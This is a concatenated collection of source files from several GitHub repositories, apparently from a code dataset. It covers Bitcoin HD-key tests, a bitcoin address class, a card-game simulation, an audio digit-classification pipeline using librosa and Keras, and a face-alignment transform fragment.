want = '<KEY>'
self.assertEqual(first_key.bech32_address(), want)
def test_zprv(self):
mnemonic, priv = HDPrivateKey.generate(entropy=1 << 128)
for word in mnemonic.split():
self.assertTrue(word in WORD_LIST)
zprv = priv.zprv()
self.assertTrue(zprv.startswith('zprv'))
zpub = priv.pub.zpub()
self.assertTrue(zpub.startswith('zpub'))
derived = HDPrivateKey.parse(zprv)
self.assertEqual(zprv, derived.zprv())
mnemonic, priv = HDPrivateKey.generate(testnet=True)
zprv = priv.zprv()
self.assertTrue(zprv.startswith('vprv'))
zpub = priv.pub.zpub()
self.assertTrue(zpub.startswith('vpub'))
xpub = priv.pub.xpub()
self.assertTrue(xpub.startswith('tpub'))
derived = HDPrivateKey.parse(zprv)
self.assertEqual(zprv, derived.zprv())
derived_pub = HDPublicKey.parse(zpub)
self.assertEqual(zpub, derived_pub.zpub())
with self.assertRaises(ValueError):
bad_zprv = encode_base58_checksum(b'\x00' * 78)
HDPrivateKey.parse(bad_zprv)
with self.assertRaises(ValueError):
bad_zpub = encode_base58_checksum(b'\x00' * 78)
HDPublicKey.parse(bad_zpub)
with self.assertRaises(ValueError):
derived_pub.child(1 << 31)
def test_errors(self):
with self.assertRaises(ValueError):
HDPrivateKey.from_mnemonic('hello')
with self.assertRaises(ValueError):
mnemonic = 'abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon'
HDPrivateKey.from_mnemonic(mnemonic)
``` |
{
"source": "jimmysong/python-bitcoinlib",
"score": 3
} |
#### File: python-bitcoinlib/bitcoin/wallet.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import bitcoin
import bitcoin.base58
import bitcoin.core.script as script
class CBitcoinAddress(bitcoin.base58.CBase58Data):
"""A Bitcoin address"""
def to_scriptPubKey(self):
"""Convert an address to a scriptPubKey"""
if self.nVersion == bitcoin.params.BASE58_PREFIXES['PUBKEY_ADDR']:
return script.CScript([script.OP_DUP, script.OP_HASH160, self, script.OP_EQUALVERIFY, script.OP_CHECKSIG])
elif self.nVersion == bitcoin.params.BASE58_PREFIXES['SCRIPT_ADDR']:
return script.CScript([script.OP_HASH160, self, script.OP_EQUAL])
else:
raise ValueError("CBitcoinAddress: Don't know how to convert version %d to a scriptPubKey" % self.nVersion)
``` |
{
"source": "jimmysteinmetz/beat-the-deck",
"score": 4
} |
#### File: jimmysteinmetz/beat-the-deck/btd_one_play.py
```python
from random import shuffle
from random import randint
suit = range(1,13)
deck = []
for i in suit:
for n in range(0,4):
deck.append(i)
shuffle(deck)
stacks = deck[0:9]
cards_in_play = deck[9:]
def eval_call(faceup, drawn):
outcome = None
midpoint = 8
my_call = "ABOVE"
if faceup > midpoint:
my_call = "BELOW"
elif faceup == midpoint:
if randint(1, 101) < 50:
my_call = "BELOW"
#print(my_call)
if my_call == "BELOW":
if drawn < faceup:
outcome = drawn
else:
if drawn > faceup:
outcome = drawn
else:
outcome = None
print(faceup)
print(my_call)
print(drawn)
print("----")
return outcome
def next_card(playing_deck):
cards_left = len(playing_deck)
if cards_left > 0:
new_card = playing_deck[0]
new_deck = playing_deck[1:]
return new_card, new_deck
counter = 1
for stack in stacks:
print("starting deck " + str(counter))
# print(stack)
# print(eval_call(stack,1))
status = "LIVE"
while status == "LIVE":
#print(type(cards_in_play))
if len(cards_in_play) == 0:
status = "WIN"
break
next_card_cur, cards_in_play = next_card(cards_in_play)
#print(stack)
stack = eval_call(stack, next_card_cur)
#print(next_card_cur)
if type(stack) == type(None):
status = "NEXT"
if len(cards_in_play) == 0:
print("WIN")
break
counter += 1
print(str(len(cards_in_play))+ " cards remaining")
'''
stack = eval_call(stack, next_card(cards_in_play)[0])
if len(cards_in_play) == 0:
print("winner")
status == "win"
elif type(stack) == type(None):
status == "next deck"
print(status)
'''
``` |
{
"source": "jimmystique/AudioClassification",
"score": 3
} |
#### File: AudioClassification/src/deep_learning_train.py
```python
import yaml
import argparse
from utils import split_data
import numpy as np
from tensorflow.keras import layers, models
from keras.utils import to_categorical
from tensorflow import keras
import tensorflow as tf
import os
import pandas as pd
from sklearn.metrics import accuracy_score
from kymatio.keras import Scattering1D
#Shapes list:
#------------
# Basic preprocesed : (30000,8000)
# MFCC : (30000,20,16)
# Chroma_stft : (30000, 12, 16)
# Root Mean Square : (30000, 1, 16)
def fast_cnn(n_classes=10, sequence_length=8000):
""" Fast CNN to use for experiments
Args:
n_classes (int): Number of classes
sequence_length (int): Length of input sequences
Returns:
(keras model): Model that groups layers into an object with training and inference features.
"""
inputs = keras.Input(shape=(sequence_length, 1), name="record")
x = layers.Conv1D(filters=1, kernel_size=1, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(inputs)
x = layers.Flatten()(x)
prediction = layers.Dense(10, activation='softmax')(x)
model = models.Model(inputs=inputs, outputs=prediction)
return model
def audionet(n_classes=10, sequence_length=8000, pool_size=2, pool_strides=2):
""" AudioNet CNN
Args:
n_classes (int): Number of classes to be predicted
sequence_length (int): Length of inputs sequences
pool_size (int): Size of the max pooling window
pool_strides (int): Specifies how much the pooling window moves for each pooling step. If None, it will default to pool_size
Returns:
(keras model): Model that groups layers into an object with training and inference features.
"""
inputs = keras.Input(shape=(sequence_length, 1), name="record")
x = layers.Conv1D(filters=100, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(inputs)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Conv1D(filters=64, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(x)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Conv1D(filters=128, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(x)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Conv1D(filters=128, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(x)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Conv1D(filters=128, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(x)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Conv1D(filters=128, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(x)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Flatten()(x)
x = layers.Dense(1024, activation="relu")(x)
x = layers.Dense(512, activation="relu")(x)
prediction = layers.Dense(10, activation='softmax')(x)
model = models.Model(inputs=inputs, outputs=prediction)
return model
def scattering_transform1d(n_classes, sequence_length):
""" Scattering transform
"""
log_eps = 1e-6
x_in = layers.Input(shape=(sequence_length))
x = Scattering1D(8, 12)(x_in)
x = layers.Lambda(lambda x: x[..., 1:, :])(x)
x = layers.Lambda(lambda x: tf.math.log(tf.abs(x) + log_eps))(x)
x = layers.GlobalAveragePooling1D(data_format='channels_first')(x)
x = layers.BatchNormalization(axis=1)(x)
x_out = layers.Dense(n_classes, activation='softmax')(x)
model = tf.keras.models.Model(x_in, x_out)
return model
def scattering_transform1d_big(n_classes, sequence_length):
""" Scattering transform with more parameters
"""
log_eps = 1e-6
x_in = layers.Input(shape=(sequence_length))
x = Scattering1D(8, 12)(x_in)
x = layers.Lambda(lambda x: x[..., 1:, :])(x)
x = layers.Lambda(lambda x: tf.math.log(tf.abs(x) + log_eps))(x)
x = layers.GlobalAveragePooling1D(data_format='channels_first')(x)
x = layers.BatchNormalization(axis=1)(x)
x = layers.Dense(512, activation='softmax')(x)
x_out = layers.Dense(n_classes, activation='softmax')(x)
model = tf.keras.models.Model(x_in, x_out)
return model
def train_dl_model(path_to_data, save_model_path, epochs, algorithm):
# X_train, X_test, y_train, y_test = split_data(path_to_data, 0.33)
X_train, X_test, X_valid, y_train, y_test, y_valid = split_data(path_to_data, 0.33, 42, 0.2, True)
###################################################
#NORMALIZE FOR SCATERRING TRANSFORM ONLY
row_sums = np.array(X_train).sum(axis=1)
X_train = X_train / row_sums[:, np.newaxis]
row_sums = np.array(X_valid).sum(axis=1)
X_valid = X_valid / row_sums[:, np.newaxis]
row_sums = np.array(X_test).sum(axis=1)
X_test = X_test / row_sums[:, np.newaxis]
#####################################################
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
y_valid = to_categorical(y_valid)
model = globals()[algorithm["name"]](**algorithm["args"])
model.summary()
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=["accuracy"])
history = model.fit(np.array(X_train), np.array(y_train), batch_size=128, epochs=epochs, validation_data=(np.array(X_valid), np.array(y_valid)))
model.save(save_model_path)
hist_json_file = os.path.join(save_model_path, 'history.json')
with open(hist_json_file, mode='w') as f:
pd.DataFrame(history.history).to_json(f, indent=4)
# Evaluation
pred = model.predict(np.array(X_test))
print(np.mean(pred.argmax(1) == y_test.argmax(1)))
if __name__ == "__main__":
np.random.seed(42)
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--config_file", default="configs/config.yaml", type=str, help = "Path to the configuration file")
args = parser.parse_args()
dl_based_training = yaml.safe_load(open(args.config_file))["deep_learning_based_training"]
# # features_based_model_train(**features_based_training)
train_dl_model(**dl_based_training)
```
#### File: AudioClassification/src/evaluate.py
```python
import pickle as pkl
import numpy as np
import argparse
import yaml
from utils import split_data
def evaluate_model(load_model_path, input_data_path, test_size, configuration):
X_train, X_test, y_train, y_test = split_data(input_data_path, test_size)
model = pkl.load(open(load_model_path, "rb" ))
flatten_train = []
flatten_test = []
for input in X_train:
flatten_train.append(input.flatten())
for input in X_test:
flatten_test.append(input.flatten())
pred_test = model.predict(flatten_test)
print("Testing accuracy for {}: {}".format(configuration,np.mean(np.array(pred_test) == np.array(y_test))))
pred_train = model.predict(flatten_train)
print("Training accuracy for {}: {}".format(configuration,np.mean(np.array(pred_train) == np.array(y_train))))
if __name__ == "__main__":
np.random.seed(42)
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config_file", default="configs/config.yaml", type=str, help = "Path to the configuration file")
args = parser.parse_args()
evaluation_cfg = yaml.safe_load(open(args.config_file))["evaluation"]
#Evaluate spectrogram rf
evaluate_model(evaluation_cfg['spectrogram_rf_model_save_path'], evaluation_cfg['spectrogram_data_path'], evaluation_cfg['test_size'], "spectrogram respresentation with randon forest")
#Evaluate mfcc rf
evaluate_model(evaluation_cfg['mfcc_rf_model_save_path'], evaluation_cfg['mfcc_data_path'], evaluation_cfg['test_size'], "MFCC with randon forest")
#Evaluate spectrogram descriptor rf
evaluate_model(evaluation_cfg['spectrogram_descriptors_rf_model_save_path'], evaluation_cfg['spectrogram_descriptors_data_path'], evaluation_cfg['test_size'], "spectrogram respresentation with randon forest")
# load_model_path = "models/model.pkl"
# model = pkl.load(open(load_model_path, "rb" ))
```
#### File: AudioClassification/src/features_extraction.py
```python
from librosa.feature import chroma_stft, rms, mfcc, spectral_centroid, spectral_bandwidth, spectral_flatness, spectral_rolloff
from librosa import feature
from librosa import stft, amplitude_to_db, magphase
import argparse
import yaml
import os
import multiprocessing
import pickle as pkl
import numpy as np
from utils import ensure_dir
import time
import datetime
import socket
def chroma_stft(processed_data_path, save_path, n_processes, sr=22050, S=None, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect', tuning=None, n_chroma=12):
""" Extract chroma features using STFT on all files at processed_data_path and save the extracted features at save_path
Args:
processed_data_path (str): Path to the directory containing the processed data
save_path (str): Path to the directory where to save the extracted features
n_processed (int): Number of processed to run at the same time to exctract features faster
sr (inter): sampling rate
S (np.ndarray): power spectrogram
norm (float or None): column-wise normalization
n_fft (int): FFT window size
hop_length (int): hop length
win_length (int): Each frame of audio is windowed by window(). The window will be of length win_length and then padded with zeros to match n_fft.
window (string, tuple, number, function, or np.ndarray [shape=(n_fft,)]): - a window specification (string, tuple, or number); see scipy.signal.get_window
- a window function, such as scipy.signal.windows.hann
- a vector or array of length n_fft
center (bool): - if True, the signal y is padded so that frame t is centered at y[t * hop_length].
- if False, then frame t begins at y[t * hop_length]
pad_mode (str): If center=True, the padding mode to use at the edges of the signal. By default, STFT uses reflection padding.
tuning (float): Deviation from A440 tuning in fractional chroma bins. If None, it is automatically estimated.
n_chroma (int): Number of chroma bins to produce (12 by default).
"""
print("Extracting Chroma Features with Short Time Fourier Transform ...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_chroma_stft, [[processed_file_path, save_path, sr, S, n_fft, hop_length, win_length, window, center, pad_mode, tuning, n_chroma] for processed_file_path in processed_data_files], chunksize=1)
def _chroma_stft(processed_file_path, save_path, sr, S, n_fft, hop_length, win_length, window, center, pad_mode, tuning, n_chroma):
""" Extract chroma features for the file at processed_file_path and save the features extracted at save_path
Args:
processed_data_path (str): Path to the directory containing the processed data
save_path (str): Path to the directory where to save the extracted features
sr (inter): sampling rate
S (np.ndarray): power spectrogram
norm (float or None): column-wise normalization
n_fft (int): FFT window size
hop_length (int): hop length
win_length (int): Each frame of audio is windowed by window(). The window will be of length win_length and then padded with zeros to match n_fft.
window (string, tuple, number, function, or np.ndarray [shape=(n_fft,)]): - a window specification (string, tuple, or number); see scipy.signal.get_window
- a window function, such as scipy.signal.windows.hann
- a vector or array of length n_fft
center (bool): - if True, the signal y is padded so that frame t is centered at y[t * hop_length].
- if False, then frame t begins at y[t * hop_length]
pad_mode (str): If center=True, the padding mode to use at the edges of the signal. By default, STFT uses reflection padding.
tuning (float): Deviation from A440 tuning in fractional chroma bins. If None, it is automatically estimated.
n_chroma (int): Number of chroma bins to produce (12 by default).
"""
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features = feature.chroma_stft(y=data, sr=sr, S=S, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode, tuning=tuning, n_chroma=n_chroma)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_chroma_stft_features.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Chroma stft features extraction on {} Saved in {}".format(processed_file_path, save_file_path))
def root_mean_square(processed_data_path, save_path, n_processes, S=None, frame_length=2048, hop_length=512, center=True, pad_mode='reflect'):
print("Extracting features with Root Mean Square ...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_root_mean_square, [[processed_file_path, save_path, S, frame_length, hop_length, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _root_mean_square(processed_file_path, save_path, S, frame_length, hop_length, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features = feature.rms(y=data, S=S, frame_length=frame_length, hop_length=hop_length, center=center, pad_mode=pad_mode)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_rms_features.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- RMS features extraction on {} Saved in {}".format(processed_file_path, save_file_path))
def mfcc(processed_data_path, save_path, n_processes, sr=22050, S=None, n_mfcc=20, dct_type=2, norm='ortho', lifter=0):
print("Extracting features with MFCC ...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_mfcc, [[processed_file_path, save_path, sr, S, n_mfcc, dct_type, norm, lifter] for processed_file_path in processed_data_files], chunksize=1)
def _mfcc(processed_file_path, save_path, sr, S, n_mfcc, dct_type, norm, lifter):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features = feature.mfcc(y=data, sr=sr, n_mfcc=n_mfcc, dct_type=dct_type, norm=norm, lifter=lifter)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_mfcc_features.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- MFCC features extraction on {} Saved in {}".format(processed_file_path, save_file_path))
def spectrogram(processed_data_path, save_path, n_processes, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect'):
print("Generating spectrograms ...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_spectrogram, [[processed_file_path, save_path, n_fft, hop_length, win_length, window, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _spectrogram(processed_file_path, save_path, n_fft, hop_length, win_length, window, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
audio_data_stft_format = stft(y=data, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode)
data_extracted_features= amplitude_to_db(abs(audio_data_stft_format))
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_spectrogram.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Generating spectrogram on {} Saved in {}".format(processed_file_path, save_file_path))
def spectrogram_centroid(processed_data_path, save_path, n_processes, sr=22050, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect'):
print("Extracting spectrogram centroid...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_spectrogram_centroid, [[processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _spectrogram_centroid(processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features= spectral_centroid(data, sr=sr, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_spectrogram_centroid.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Extracting spectrogram centroid on {} Saved in {}".format(processed_file_path, save_file_path))
def spectrogram_bandwith(processed_data_path, save_path, n_processes, sr=22050, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect'):
print("Extracting spectrogram bandwith...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_spectrogram_bandiwth, [[processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _spectrogram_bandiwth(processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features= spectral_bandwidth(data, sr=sr, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_spectrogram_bandwith.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Extracting spectrogram bandwith on {} Saved in {}".format(processed_file_path, save_file_path))
def spectrogram_flatness(processed_data_path, save_path, n_processes, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect'):
print("Extracting spectrogram flatness...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_spectrogram_flatness, [[processed_file_path, save_path, n_fft, hop_length, win_length, window, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _spectrogram_flatness(processed_file_path, save_path, n_fft, hop_length, win_length, window, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features= spectral_flatness(data, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_spectrogram_flatness.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Extracting spectrogram flatness on {} Saved in {}".format(processed_file_path, save_file_path))
def spectrogram_rolloff(processed_data_path, save_path, n_processes, sr=22050, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect'):
print("Extracting spectrogram bandwith...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_spectrogram_rolloff, [[processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _spectrogram_rolloff(processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features= spectral_rolloff(data, sr=sr, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_spectrogram_rolloff.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Extracting spectrogram rolloff on {} Saved in {}".format(processed_file_path, save_file_path))
def extract_features(processed_data_path, save_path, n_processes, algorithm):
""" Extract features from files at processed_data_path and save the extracted features found at save_path
Args:
processed_data_path (str): Path to the directory containing the processed data
save_path (str): Path to the directory where to save the extracted features
n_processed (int): Number of processed to run at the same time to exctract features faster
algorithm (dict): Dictionary containing a key "name" (corresponding to the name of a function that will be call to build a model) and a key "args" containing the hyperparameters of the model to be built.
"""
print(processed_data_path)
print(algorithm)
t1 = time.time()
globals()[algorithm["name"]](processed_data_path, save_path, n_processes, **algorithm["args"])
t2 = time.time()
with open("logs/logs.csv", "a") as myfile:
myfile.write("{:%Y-%m-%d %H:%M:%S},extract {} features,{},{},{:.2f}\n".format(datetime.datetime.now(),algorithm["name"],socket.gethostname(),n_processes,t2-t1))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--config_file", default="configs/config.yaml", type=str, help = "Path to the configuration file")
args = parser.parse_args()
features_extraction_cfg = yaml.safe_load(open(args.config_file))["features_extraction"]
print(features_extraction_cfg)
extract_features(**features_extraction_cfg)
```
#### File: AudioClassification/src/preprocessing.py
```python
import os
import pandas as pd
import pickle as pkl
import numpy as np
import argparse
import yaml
import librosa
import scipy
from scipy.io import wavfile
import multiprocessing
import time
import datetime
import socket
def resample_wav_data(wav_data, orig_sr, target_sr):
""" Resample wav_data from sampling rate equals to orig_sr to a new sampling rate equals to target_sr
"""
# resampled_wav_data = librosa.core.resample(y=wav_data.astype(np.float32), orig_sr=orig_sr, target_sr=target_sr)
resampled_wav_data = scipy.signal.resample(wav_data, target_sr)
# print(wav_data, resampled_wav_data, len(resampled_wav_data))
return resampled_wav_data
def pad_wav_data(wav_data, vect_size):
""" Pad wav data
"""
if (len(wav_data) > vect_size):
raise ValueError("")
elif len(wav_data) < vect_size:
padded_wav_data = np.zeros(vect_size)
starting_point = np.random.randint(low=0, high=vect_size-len(wav_data))
padded_wav_data[starting_point:starting_point+len(wav_data)] = wav_data
else:
padded_wav_data = wav_data
return padded_wav_data
def fft_preprocess_user_data_at_pth(user_data_path, preprocessed_data_path, vect_size):
print(user_data_path)
user_df = pd.DataFrame(columns=['data', "user_id", "record_num", "label"])
wav_user_id = 0
for file in sorted(os.listdir(user_data_path)):
if file.endswith(".wav"):
wav_label, wav_user_id, wav_record_n = os.path.splitext(file)[0].split("_")
wav_sr, wav_data = wavfile.read(os.path.join(user_data_path, file))
resampled_wav_data = resample_wav_data(wav_data, wav_sr, vect_size)
# new_row = {"data": padded_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
new_row = {"data": resampled_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
user_df = user_df.append(new_row, ignore_index=True)
pkl.dump( user_df, open("{}_preprocessed.pkl".format(os.path.join(preprocessed_data_path, str(wav_user_id))), "wb" ) )
def downsampling_preprocess_user_data_at_pth(user_data_path, preprocessed_data_path, target_sr, vect_size):
print(user_data_path)
user_df = pd.DataFrame(columns=['data', "user_id", "record_num", "label"])
wav_user_id = 0
for file in sorted(os.listdir(user_data_path)):
if file.endswith(".wav"):
wav_label, wav_user_id, wav_record_n = os.path.splitext(file)[0].split("_")
wav_sr, wav_data = wavfile.read(os.path.join(user_data_path, file))
y,s = librosa.load(os.path.join(user_data_path, file), target_sr)
padded_wav_data = pad_wav_data(y, vect_size)
new_row = {"data": padded_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
user_df = user_df.append(new_row, ignore_index=True)
pkl.dump(user_df, open("{}_preprocessed.pkl".format(os.path.join(preprocessed_data_path, str(wav_user_id))), "wb" ) )
def preprocess(raw_data_path, preprocessed_data_path, resampling_method, n_process, vect_size, target_sr=8000,):
#Create preprocessed_data_path if the directory does not exist
if not os.path.exists(preprocessed_data_path):
os.makedirs(preprocessed_data_path)
users_data_path = sorted([folder.path for folder in os.scandir(raw_data_path) if folder.is_dir() and any(file.endswith(".wav") for file in os.listdir(folder))])
print(users_data_path)
# pool=multiprocessing.Pool(n_process)
pool=multiprocessing.Pool(1)
if resampling_method == 'fft':
print("Resampling with FFT ...")
pool.starmap(fft_preprocess_user_data_at_pth, [[folder, preprocessed_data_path, vect_size] for folder in users_data_path if os.path.isdir(folder)], chunksize=1)
elif resampling_method == 'downsampling':
print("Resampling by downsampling ...")
pool.starmap(downsampling_preprocess_user_data_at_pth, [[folder, preprocessed_data_path, target_sr, vect_size] for folder in users_data_path if os.path.isdir(folder)], chunksize=1)
else:
raise ValueError(f"method {method} does not exist")
if __name__ == "__main__":
np.random.seed(42)
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--preprocessing_cfg", default="configs/config.yaml", type=str, help = "Path to the configuration file")
args = parser.parse_args()
preprocessing_cfg = yaml.safe_load(open(args.preprocessing_cfg))["preprocessing"]
t1 = time.time()
preprocess(**preprocessing_cfg)
t2 = time.time()
with open("logs/logs.csv", "a") as myfile:
myfile.write("{:%Y-%m-%d %H:%M:%S},data preprocessing,{},{},{:.2f}\n".format(datetime.datetime.now(),socket.gethostname(),preprocessing_cfg['n_process'],t2-t1))
print("Time elapsed for data processing: {} seconds ".format(t2-t1))
#Preprocessing : ~113s using Parallel computing with n_processed = 10 and resampling with scipys
#Preprocessing : ~477.1873028278351 seconds using Parallel computing with n_processed = 10 and resampling with resampy (python module for efficient time-series resampling)
``` |
{
"source": "jimmysue/xvision",
"score": 2
} |
#### File: xvision/candy/mnist.py
```python
from candy.driver import *
import torch.nn as nn
from torchvision.datasets.mnist import MNIST
class LeNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, )
```
#### File: projects/fa/transform.py
```python
import cv2
import numpy as np
from numbers import Number
from typing import Dict
from xvision.transforms.umeyama import umeyama
from xvision.transforms.warp import warp_affine
from xvision.transforms.boxes import bbox_affine
from xvision.transforms import matrix2d
from xvision.transforms.shapes import *
from xvision.utils.draw import draw_points
def _to_size(dsize):
if isinstance(dsize, Number):
dsize = (int(dsize), int(dsize))
elif isinstance(dsize, (tuple, list)) and len(dsize) == 2:
width, height = dsize
dsize = (int(width), int(height))
else:
raise ValueError(f'Invalid dsize: {dsize}')
return dsize
class CacheTransform(object):
def __init__(self, dsize, padding, meanshape) -> None:
super().__init__()
self.dsize = _to_size(dsize)
self.padding = padding
self.meanshape = meanshape
meanshape = np.array(meanshape)
unit = to_unit_shape(meanshape)
self.cache_size = tuple(
(np.array(self.dsize) * 2).astype(np.int32).tolist())
self.ref = (unit - 0.5) * (1 - padding) * \
np.array(dsize).min() + np.array(dsize)
def __call__(self, item) -> Dict:
image = cv2.imread(str(item['path']), cv2.IMREAD_COLOR)
shape = item['shape']
matrix = umeyama(shape, self.ref)
image = warp_affine(image, matrix, self.cache_size)
shape = shape_affine(shape, matrix)
return {
'image': image,
'shape': shape
}
def _bbox_to_corner_points(bbox):
x1, y1, x2, y2 = bbox.reshape(-1)
return np.array([
[x1, y1],
[x2, y1],
[x2, y2],
[x1, y2]
])
class Transform(object):
def __init__(self, dsize, padding, meanshape, meanbbox=None, symmetry=None, augments=None) -> None:
super().__init__()
